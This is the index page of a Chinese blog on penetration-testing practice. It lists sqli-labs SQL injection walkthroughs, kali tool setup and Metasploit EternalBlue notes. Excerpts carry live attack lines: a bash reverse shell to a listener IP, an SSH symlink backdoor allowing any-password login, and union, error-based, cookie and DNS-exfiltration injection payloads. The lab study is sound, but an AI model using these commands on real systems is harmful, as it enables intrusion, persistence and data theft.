![](https://img-blog.csdnimg.cn/20201014180756923.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
渗透测试
songling515010475
这个作者很懒,什么都没留下…
展开
-
dns隧道攻击
dns隧道攻击原创 2022-06-10 15:43:36 · 1484 阅读 · 2 评论 -
icmp隧道工具之ptunnel使用
ptunnel工具使用原创 2022-06-10 09:34:20 · 875 阅读 · 0 评论 -
反弹shell
一、通过bash反弹shell1、 在攻击机上通过nc命令监听2222端口┌──(kali㉿kali)-[~/Desktop]└─$ nc -lvvp 2222listening on [any] 2222 ...2、在服务器上连接攻击机(192.168.137.131)上面监听的2222端口[root@localhost netcat-0.7.1]# bash -i >& /dev/tcp/192.168.137.131/2222 0>&13、连..原创 2022-05-11 15:41:31 · 1641 阅读 · 0 评论 -
通过SSH留后门(创建ssh软链接)
一、判断sshd_config配置中的UsePAM参数是否为yescat /etc/ssh/sshd_config二、确认对应的pam配置文件是否包含auth sufficient pam_rootok.so配置,只在包含这件配置才可以通过ssh任意密码登录。三、通过命令创建后门软链接,通过查看端口己监听。ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=12345netstat -antlp四、通过另一台机器ssh进行任意密码登转载 2022-05-10 11:06:14 · 2216 阅读 · 0 评论 -
sqli-labs靶场Less-23 注释绕过
这里过滤掉了 # 和 -- ,所以这里第一条件就是要让union前面的条件失效,第二就是通过结尾的and '1'='1 进行绕过?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() and '1'='1...原创 2021-08-27 16:22:14 · 261 阅读 · 0 评论 -
sqli-labs靶场Less-20~22 Cookie注入
cookie注入的内容一定要进行url编码admin%27%20and%201%3D2%20union%20select%201%2Cdatabase()%2Cversion()--%20qwe解码后admin' and 1=2 union select 1,database(),version()-- qwe原创 2021-08-27 10:12:15 · 217 阅读 · 0 评论 -
sqli-labs靶场Less-19
POST /sqlilabs/Less-19/ HTTP/1.1Host: 192.168.60.142:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN.原创 2021-08-27 09:42:05 · 178 阅读 · 0 评论 -
sqli-labs靶场Less-18
POST /sqlilabs/Less-18/ HTTP/1.1Host: 192.168.60.142:8080User-Agent: ',updatexml(1,concat(0x7e,(select database())),1),1)-- qweAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0..原创 2021-08-27 09:11:26 · 123 阅读 · 0 评论 -
sqli-labs靶场Less-17
1、访问首页,/Less-17/index.php,这里的传参点是表单中的uname、passwd判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 结合1~5判断是否存在延时注入 结合1~5判断是否存在报错注入(假设查询语句没错,代码中的其它语句可以报错) 结合1~5判断是否存在head注入 ' and updatexml(1,concat(0x7e,(select database(...原创 2021-08-26 17:13:39 · 138 阅读 · 0 评论 -
sqli-labs靶场Less-16
1、访问首页,/Less-16/index.php,这里的传参点是表单中的uname、passwd判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 如果以上都不适:哪以上规则都同时加上sleep测试一遍,看是不是存在延时注入2、判断字段数admin") order by 2-- qwe3、判断数据库长度-- 盲注admin") and length(database())=8-- ...原创 2021-08-26 16:26:14 · 109 阅读 · 0 评论 -
sqli-labs靶场Less-15
1、访问首页,/Less-15/index.php,这里的传参点是表单中的uname、passwd判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 如果以上都不适:哪以上规则都同时加上sleep测试一遍,看是不是存在延时注入分析:这里同时存在布尔型(延时)注入,哪这里可以使用盲注 或 延时盲注来做这个题。2、使用盲注获取数据库长度-- 盲注admin' and length(databa...原创 2021-08-26 11:23:58 · 232 阅读 · 0 评论 -
sqli-labs靶场Less-14
1、访问首页,/Less-14/index.php,这里的传参点是表单中的uname、passwd探测六步判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注2、使用报错注入获取库名" and updatexml(1,concat(0x7e,(select database())),1) -- qwe3、获取表名 " and updatexml(1,concat(0x7e,...原创 2021-08-25 17:00:47 · 114 阅读 · 0 评论 -
sqli-labs靶场Less-13
1、访问首页,/Less-13/index.php,这里的传参点是表单中的uname、passwd探测六步判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注分析:这里是单引号+括号闭合,但这里正确时并没有显示点,但在探测过程中会报SQL语名错误的内容,所以这里判断可以用报错注入。2、尝试使用报错注入admin') and updatexml(1,concat(0x7e,(select .原创 2021-08-25 16:37:54 · 138 阅读 · 0 评论 -
sqli-labs靶场Less-12
1、访问首页,/Less-12/index.php,这里的传参点是表单中的uname、passwd探测六步判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注2、通过在uname后面拼接参数 order by 1~3 ,如下图3的时候提示没有3个字段,只有2个。admin") order by 3-- qwe3、查看SQL结果显示点") union select 1,2-- ..原创 2021-08-25 16:27:37 · 265 阅读 · 0 评论 -
sqli-labs靶场Less-11
1、访问首页,/Less-10/index.php,这里的传参点是表单中的uname、passwd探测六步判断是否是数字形传参 判断是否有单引号闭合 admin' -- qwe 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注分析:这里是通过单引号闭合,注释掉后面的SQL直接绕过登录2、通过在uname后面拼接参数 order by 1~3 ,如下图3的时候提示没有3个字段,只有2个。3、通过uni...原创 2021-08-25 15:43:53 · 130 阅读 · 0 评论 -
sqli-labs靶场Less-10
1、访问首页,/Less-10/index.php?id=1,这里的传参点是id探测六步判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注http://192.168.60.142:8080/sqlilabs/Less-10/index.php?id=1' and sleep(10)-- qwe分析:这里使用的是双引号闭合+延时盲注,和第9关一样的操作,只是闭合不一样。2、使用 i..原创 2021-08-25 14:52:27 · 334 阅读 · 0 评论 -
sqli-labs靶场Less-9
1、访问首页,/Less-9/index.php?id=1,这里的传参点是id探测六步判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注http://192.168.60.142:8080/sqlilabs/Less-9/index.php?id=1' and sleep(10)-- qwe分析:通过测试,这里是通过单引号闭合,同时使用延时注入才生效,哪么在以后SQL注入探测时,当前面5.原创 2021-08-25 10:34:23 · 154 阅读 · 0 评论 -
sqli-labs靶场Less-8
1、访问首页,/Less-8/index.php?id=1,这里的传参点是id探测五步判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合分析:这里是单引号闭合,且这里输错SQL语句没有报错和提示,只是不展示数据而己。哪么这里能用到的方式与第7关一样,2、判断字段数量http://192.168.60.142:8080/sqlilabs/Less-8/index.php?id=1' order b..原创 2021-08-23 16:13:02 · 215 阅读 · 0 评论 -
sqli-labs靶场Less-7
备注:虽然从首页进来就知道是dump into outfile但我还是假设按不知道的流程来一步步尝试,这样才会印象深刻,不然我觉得失去练习的意义了。1、访问首页,/Less-7/index.php?id=1,这里的传参点是id探测五步判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合这里我还是按原因来的先探测五步走一遍,结果发现只有两种结果如下:结果1:结果2:分析:这里我尝试不管是怎么样,通过...原创 2021-08-21 16:59:25 · 331 阅读 · 0 评论 -
sqli-labs靶场Less-6
1、访问首页,/Less-6/index.php?id=1,这里的传参点是id探测五步曲判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合http://192.168.21.144:8080/sqlilabs/Less-6/index.php?id=1" and 1=2-- qwe2、存在SQL注入,但是这里不存在回显点,故意输出错误的SQL,看页面是否报错,如果报错有回显哪么就可以使用报错注入,如果报错也没有.原创 2021-08-21 13:33:30 · 160 阅读 · 0 评论 -
sqli-labs靶场Less-5
1、访问首页,/Less-5/index.php?id=1,这里的传参点是id探测五步曲判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合搬出自己准备好的5步曲......好尴尬......慢慢有点难度了哟结论:通过单引号闭合, 再用and 1=1 与 and 1=2控制条件,发现即不报错又能控制显示的文字。2、判断字段数量http://192.168.60.142:8080/sqlilabs/L..原创 2021-08-20 17:22:46 · 208 阅读 · 0 评论 -
sqli-labs靶场Less-4
1、访问首页,/Less-4/index.php?id=1,这里的传参点是id 探测五步曲判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合结论:通过以上判断,该注入点是由 ") 双引号加括号闭合的。2、判断字段数量http://192.168.60.142:8080/sqlilabs/Less-4/index.php?id=1") order by 4-- qwe通过以上or...原创 2021-08-20 15:23:25 · 79 阅读 · 0 评论 -
sqli-labs靶场Less-3
1、访问首页,index.php?id=1,这里的传参点是id2、判断注入点是数字还是字符,如果是字符就需要闭合and 1=1-- qweand 1=2-- qwe分析:通过以上探测发现并不起效果,考虑是不是和第一关一样需要单引号闭合,再次尝试' and 1=1-- qwe分析:通过单引号闭合发现报错了,难道是双引号闭合?再次尝试分析:尴尬了,单双引号都不行?对于初学者的我,一下子脑子短路了,于是翻了一下源代码,一下突然惊醒,还有括号没试,还是不细心呀..原创 2021-08-20 15:03:49 · 366 阅读 · 0 评论 -
sqli-labs靶场Less-2
1、访问首页,index.php?id=1,这里的传参点是id2、判断注入点是数字还是字符,如果是字符就需要闭合and 1=1-- qweand 1=2-- qwe从以上探测来看,传参是用的数字3、判断字段数量通过以上order by 1~4 最后order by 4 时报错,说明一共有3个字段4、查询回显点 ?id=1 and 1=2 union select 1,2,3-- qwe注意:和less-1一样,要么把union前面参数值改大,要么...原创 2021-08-20 10:29:16 · 162 阅读 · 0 评论 -
sqli-labs靶场Less-1
1、访问首页,index.php?id=1,这里的传参点是id2、判断是否在SQL注入and 1=1-- qweand 1=2-- qwe分析:从以上两种探测形式来看,and 1=1 和 and 1=2并没有影响结果,难道不存在SQL注入?当然不可能,这是靶场SQL注入肯定是存在的.----------------------------------------------------往下看-----------------------------------------原创 2021-08-19 17:41:28 · 171 阅读 · 0 评论 -
docker搭建sqli-labs靶场
1、启动docker[root@localhost ~]# service docker start Redirecting to /bin/systemctl start docker.service2、搜索sqli-labs镜像[root@localhost ~]# docker search sqli-labsNAME DESCRIPTION STARS OF原创 2021-08-19 10:42:48 · 622 阅读 · 0 评论 -
kali安装awvs
http://127.0.0.1/mutillidae/database-offline.php原创 2021-08-18 17:22:03 · 2010 阅读 · 0 评论 -
kali通过msf利用永恒之蓝攻击服务器
1、通过命令“msfconsole”启动msf,或者通过菜单启动msfmsf模块说明:exploits:攻击模块,利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,从而获得对远程目标系统访问权限 的代码组件。auxiliary:辅助模块,为渗透测试信息搜集提供了大量的辅助模块支持,如负责扫描、收集、嗅探、指纹识别、口令猜测等。payloads:攻击载荷模块,攻击成功后促使靶机运行的一段植入代码。post:后渗透攻击模块,收集更多信息或进一步访问被利用的目标系统。encoders原创 2021-04-30 11:08:22 · 5705 阅读 · 3 评论 -
kali安装DVWA
kali@kali:~$ whereis mysqlmysql: /usr/bin/mysql /etc/mysql /usr/share/mysql /usr/share/man/man1/mysql.1.gzkali@kali:~$ whereis apache2apache2: /usr/sbin/apache2 /usr/lib/apache2 /etc/apache2 /usr/share/apache2 /usr/share/man/man8/apache2.8.gzkali...原创 2021-01-08 17:00:53 · 10876 阅读 · 0 评论 -
kali安装chrome
1、下载官网地址:https://www.chrome64bit.com/index.php/google-chrome-64-bit-for-linux但这里可以直接wget下载,免去共享文件去传到kali虚机中,更文件。wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb2、使用 sudo dpkg -igoogle-chrome-stable_current_amd6...原创 2020-12-21 20:50:43 · 626 阅读 · 0 评论 -
VMware下设置Kali访问本机共享文件夹
1、虚拟机-->设置-->选项 (打开虚拟机设置)2、执行安装vm-tolls命令sudo apt-get install open-vm-tools-desktop fusekali@kali:~$ sudo apt-get install open-vm-tools-desktop fuse正在读取软件包列表... 完成正在分析软件包的依赖关系树 正在读取状态信息... 完成 fuse 已经是最新版 (2.9.9-3)。建议安...原创 2020-12-21 11:15:43 · 3064 阅读 · 0 评论 -
kali安装蚁剑
1、下载下载地址:https://github.com/AntSwordProject/2、安装原创 2020-09-08 09:27:17 · 6043 阅读 · 4 评论 -
kali系统汉化
sudo apt-get updatesudo apt-get install ttf-wqy-microhei ttf-wqy-zenhei xfonts-wqysudo dpkg-reconfigure locales原创 2020-09-05 16:06:20 · 282 阅读 · 0 评论 -
firefox浏览器 用burp suite 抓不到本地的包
1.打开火狐浏览器 “选项”2.点击接受风险。3.在输入框中输入: network.proxy.allow_hijacking_localhost4.点击完后的效果,改成true就可以抓到本地包了。原创 2020-07-10 21:40:17 · 2132 阅读 · 2 评论 -
phpstudy安装安全狗找不到服务名
1、安装安全狗时出现找不到服务名2、切记一定要以管理员身份运行命令窗口3、进入到apache的安装目录D:\>cd D:\phpstudy_pro\Extensions\Apache2.4.39\bin4、在apache停止的状态下运行如下命令D:\phpstudy_pro\Extensions\Apache2.4.39\bin>httpd.exe -k install -n apache2.4.395、重新安装安全狗...原创 2020-06-18 22:54:17 · 3027 阅读 · 0 评论 -
18、SQL HEAD注入
Head注入的区别与GET/POST的区别在于,HEAD时面的参数如果不存数据库,注入进去是没有任何意义的,而GET/POST在业务增删改查过种中上肯定会要操作数据库的,但现在软件一般都有日志记录,保存到数据库中。虽然我知道 这是Head注入,但忍不住试一下POST能不能提交,哈哈被过滤了*进入正题:获取数据库库名User-Agent:’ or updatexml(1,concat(0x7e,(select database())),1),1)#User-Agent本身是用于后台识别客户端原创 2020-05-22 10:24:10 · 361 阅读 · 0 评论 -
18、SQL盲注
Boolen盲注就是通过判断数据能不能够回显来判断是否存在盲注,既然是Boolean型盲注哪么从字面意思上就可以知道,返回的值True/False1.判断是否存在SQL注入2.尝试获判断库名的长度(这里我己经通过大于小于判断出来了库名长度为12)3.通过Burp抓包,尝试对库名第一位进行爆破4.设置从0~127位,每一个都去进行比较5.通过Response返回结果不一样的,看结果是否正常返回了数据,正常说明条件为True,说明就是这个字符。这里爆破出来的第一个字...原创 2020-05-22 10:20:05 · 231 阅读 · 0 评论 -
17、SQL显错注入
1.判断是否存在注入,先通过 and 1=1 或 1=2 判断是否存在sql注入,如下图,1=1在sql中运算是为真,1=2为假,所以判断添加的注入是生效了,所以存在SQL注入。2.猜字段数,通过order by 的形式猜当前查询语句一共有几个字段,通过如下图得出结论 user表一共有三个字段。3.猜表名,注入免不了联合查询,既然前面是三个字段哪么联合查询左边和右边查询出来的字段数是必须要匹配的。作为一个新手,我并不记得老师讲课时注入的具体代码,反正英文挺长的,但记得提到了my.原创 2020-05-22 10:14:01 · 307 阅读 · 0 评论 -
16、Mysql - dns注入
为什么load_file能执行?因为在mysql配置文件里开启了secure_file_priv服务,导致不对mysql的导入导出不做任何限制。1.前往dnslog.cn申请一个域名2.防止被WAF拦截,所以在后面拼接/123.txt?id=123当作参数,因为.txt会被WAF认为txt是不能传参数的,是安全的。申请的域名,前面要加三级域名,后面也要加路径,否则不会生效。/123.txt?id=123 and load_file(concat('//',(select database原创 2020-05-22 10:09:46 · 171 阅读 · 0 评论 -
15、Access - 偏移注入
1.通过and 1=1 和 and 1=2判断是否存在SQL注入2.通过order by判断显错位字段,最多可显示多少字段。3.既然是26个字段,哪么确定在页面显示26个显错位中最终是显示哪几位。4.一共26个字段,哪么admin一共有几个字段呢?flag的字段又是在哪一位呢?只能从最后往前面,一个个的数字踢掉,至到不报错为止,然后显错位是,3,5,7,25 把admin分别在各个位置下移动,直到找到flag。...原创 2020-05-22 10:09:15 · 161 阅读 · 6 评论